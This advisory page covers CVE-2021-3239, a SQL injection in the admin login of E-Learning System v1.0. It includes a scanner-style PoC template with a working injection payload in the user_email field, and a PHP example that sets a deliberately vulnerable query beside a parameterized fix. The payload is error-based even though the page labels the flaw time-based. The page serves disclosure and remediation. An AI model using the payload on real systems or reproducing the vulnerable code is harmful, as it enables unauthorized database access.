CVE-2021-3239: E-Learning System v1.0 Time-Based Blind SQL Injection Vulnerability

Date: 2025-08-01 | Affected software: E-Learning System | PoC: published

Vulnerability Description

The user_email parameter appears to be vulnerable to time-based blind SQL injection. Submitting a single quote in the user_email parameter returned a generic database error message; submitting two single quotes made the error message disappear, which indicates that the input is placed directly inside a quoted SQL string.

PoC Code [published]

id: CVE-2021-3239

info:
  name: E-Learning System v1.0 SQL注入基于时间盲注漏洞
  author: nu11secur1ty
  severity: critical
  description: |-
    user_email 参数似乎容易受到基于时间的盲注的 SQL 注入攻击。 在 user_email 参数中提交了单引号,并返回了一般错误消息。 然后提交了两个单引号,错误信息就消失了。
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101821
    - https://www.tenable.com/security/research/tra-2021-34
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3239
  tags: cve,cve2021,sqli,blind,time-bind
  created: 2023/06/23

set:
  hosturl: request.url
rules:
  r0:
    request:
      method: POST
      path: /admin/login.php
      headers:
        Origin: "{{hosturl}}"
        Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
        Referer: "{{hosturl}}/admin/login.php"
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
        Connection: close
        Cache-Control: max-age=0
      body: |
        user_email=QXVzAYzI@nu11secur1tycollaborator.net#'||(SELECT 0x57745147 WHERE 1914=1914 AND (SELECT 7338 FROM(SELECT COUNT(*),CONCAT(0x716a7a7171,(SELECT (ELT(7338=7338,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&user_pass=u0U!y2z!D9&btnLogin=%C2%9E%C3%A9e
    expression: response.status == 200 && response.body.bcontains(b'mysqli_query():')
expression: r0()
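As an added illustration, not code from the E-Learning System project (whose source this page does not show), the following PHP contrasts the string-concatenation pattern that the description implies for /admin/login.php with a parameterized version. The table name users, the id column, and the assumption that user_pass holds a password_hash() value are hypothetical; user_email and user_pass are the parameter names from the page.

```php
<?php
// Added example: a hypothetical reconstruction of the admin/login.php pattern the
// advisory describes, placed beside a hardened form. Table/column names other than
// user_email and user_pass are assumptions.

// VULNERABLE: user input is spliced into the SQL text and the mysqli_query()
// warning is echoed into the response (the PoC's expression keys on "mysqli_query():").
function login_vulnerable(mysqli $db, string $email, string $pass): ?array
{
    // A single quote in $email terminates the string literal early and the query
    // fails with a warning; two quotes ('') form a valid escaped quote, so the
    // warning disappears. That difference is what the description observed.
    $sql = "SELECT * FROM users WHERE user_email = '$email' AND user_pass = '$pass'";
    $res = mysqli_query($db, $sql);              // warning text reaches the client
    return $res ? (mysqli_fetch_assoc($res) ?: null) : null;
}

// HARDENED: parameters never become part of the SQL text, so quotes cannot change
// the statement's structure; DB errors are logged server-side, not echoed; the
// password is checked with password_verify() against a stored password_hash().
function login_hardened(mysqli $db, string $email, string $pass): ?array
{
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // exceptions, not warnings
    try {
        $stmt = $db->prepare(
            'SELECT id, user_email, user_pass FROM users WHERE user_email = ? LIMIT 1'
        );
        $stmt->bind_param('s', $email);
        $stmt->execute();
        $row = $stmt->get_result()->fetch_assoc();
    } catch (mysqli_sql_exception $e) {
        error_log('login query failed: ' . $e->getMessage()); // server log only
        return null;                                           // generic failure to client
    }
    // Assumes user_pass stores a password_hash() value (hypothetical schema).
    if ($row && password_verify($pass, $row['user_pass'])) {
        unset($row['user_pass']);
        return $row;
    }
    return null;
}
```

With the hardened form, both a single quote and a doubled quote in user_email simply fail to match any row, so the error-based distinction the PoC relies on no longer exists.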
